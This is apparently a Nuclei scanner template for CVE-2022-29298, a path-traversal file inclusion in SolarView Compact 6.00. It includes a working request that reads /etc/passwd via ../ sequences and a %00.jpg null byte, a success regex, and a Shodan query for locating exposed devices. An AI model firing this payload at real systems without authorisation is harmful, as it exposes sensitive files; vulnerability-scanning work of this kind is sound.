id: CVE-2022-29298 info: name: SolarView Compact 6.00 - Local File Inclusion author: ritikchaddha severity: high description: SolarView Compact 6.00 is vulnerable to local file inclusion which could allow attackers to access sensitive files. reference: - https://www.exploit-db.com/exploits/50950 - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view?usp=sharing - https://nvd.nist.gov/vuln/detail/CVE-2022-29298 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-29298 cwe-id: CWE-22 metadata: shodan-query: http.html:"SolarView Compact" verified: "true" tags: lfi,solarview,edb,cve,cve2022 requests: - method: GET path: - "{{BaseURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg" matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200 # Enhanced by mp on 2022/07/15